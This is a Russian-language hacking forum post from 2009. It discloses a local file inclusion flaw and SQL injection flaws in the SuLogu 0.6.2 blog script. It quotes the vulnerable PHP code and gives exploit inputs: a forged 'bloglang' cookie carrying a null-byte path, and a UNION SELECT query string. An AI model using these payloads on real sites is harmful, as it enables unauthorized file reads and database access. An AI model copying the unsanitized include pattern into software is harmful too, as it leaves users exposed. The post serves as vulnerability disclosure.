ANTICHAT.XYZ    VIDEO.ANTICHAT.XYZ    НОВЫЕ СООБЩЕНИЯ    ФОРУМ  
Баннер 1   Баннер 2
Antichat снова доступен.
Форум Antichat (Античат) возвращается и снова открыт для пользователей. Здесь обсуждаются безопасность, программирование, технологии и многое другое. Сообщество снова собирается вместе.
Новый адрес: forum.antichat.xyz
Вернуться   Форум АНТИЧАТ > Безопасность и Уязвимости > Уязвимости > Сценарии/CMF/СMS
   
 
 
Опции темы Поиск в этой теме Опции просмотра

  #11  
Старый 15.11.2009, 01:11
Аватар для m0Hze
m0Hze
Он хакер.
Регистрация: 01.11.2008
Сообщений: 1,756
Провел на форуме:
6462214

Репутация: 3171


По умолчанию

Product: SuLogu
Author: unnamed
Version: 0.6.2

LFI

file: comments.php
PHP код:
...
if (!
$language) {
    
// try to set the user's preferred language from a previous cookie
    
if ($_COOKIE['bloglang']) {
        
$language $_COOKIE['bloglang'];
    } else {
        
$language $defaultlanguage;
        
setcookie("bloglang"$defaultlanguage);
    }
} else {    
// language must exists among defined tags
    
if (!languageexists($language)) {
        
$language $defaultlanguage;
        
setcookie("bloglang"$defaultlanguage);
    }
}

// Include corresponding language file.
include("language/" $language ".php");
... 
target: Отправляем поддельный запрос на сервер,и подставляем в COOKIES: bloglang={LFI}'%00; За пределы директории у меня не вышел,возможно вам повезет больше (:

Также там множество SQL-inj, но разработчики просто удивляют нас,тем что расчитывают,что везде будет включено registers_global.
Например:


file: index.php
PHP код:
...
function 
imagenavmenu($id$page) {
    global 
$showall$language;

    
$res mysql_query("SELECT id FROM blogimages WHERE id < " $id " ORDER BY id DESC LIMIT 1");
... 
Но $id нигде не будет объявляться,так что скрипт,как и SQL-inj убдет работать только на registers_global = on;
?id=-1+union+select+1,2,3,4,version(),6,7/*

Последний раз редактировалось m0Hze; 15.11.2009 в 15:54..
 
Ответить с цитированием
 



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Библиотека SladerNon Болталка 17 05.02.2007 23:30
Основные методы взлома и защиты скриптов на Php DIAgen Авторские статьи 8 28.05.2006 12:30



Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ